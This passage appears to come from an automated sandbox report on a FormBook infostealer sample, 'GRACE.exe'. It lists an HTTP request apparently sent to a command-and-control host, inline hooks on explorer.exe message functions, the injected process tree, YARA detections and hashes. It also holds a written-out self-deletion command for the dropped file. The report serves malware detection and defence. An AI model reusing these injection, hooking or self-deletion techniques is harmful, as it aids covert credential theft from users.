0 | 192.168.2.3 | 49739 | 216.250.110.35 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 07:58:44.928558111 CET | 3995 | OUT | GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1
Host: www.dl888.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 07:58:45.210340023 CET | 3996 | IN | HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 27 Jan 2021 06:58:37 GMT
Connection: close
Data Raw:
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312"><STYLE type="text/css"> BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li></li><li></li><li><a href="javascript:history.back(1)"></a></li></ul><h2>HTTP 404 - <br>Internet (IIS)</h2><hr><p></p><ul><li> <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft </a>&ldquo;HTTP&rdquo;&ldquo;404&rdquo;</li><li>&ldquo;IIS &rdquo; IIS (inetmgr)


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE3

Statistics

Behavior


System Behavior

General

Start time: 07:57:09
Start date: 27/01/2021
Path: C:\Users\user\Desktop\GRACE.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\GRACE.exe'
Imagebase: 0x1e0000
File size: 3215360 bytes
MD5 hash: 9034ACBB2742281523525D715A4EE566
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 07:57:44
Start date: 27/01/2021
Path: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase: 0x8e0000
File size: 42080 bytes
MD5 hash: F2A47587431C466535F3C3D3427724BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 07:57:49
Start date: 27/01/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:58:01
Start date: 27/01/2021
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\netsh.exe
Imagebase: 0x16b0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 07:58:07
Start date: 27/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase: 0x1220000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:58:07
Start date: 27/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
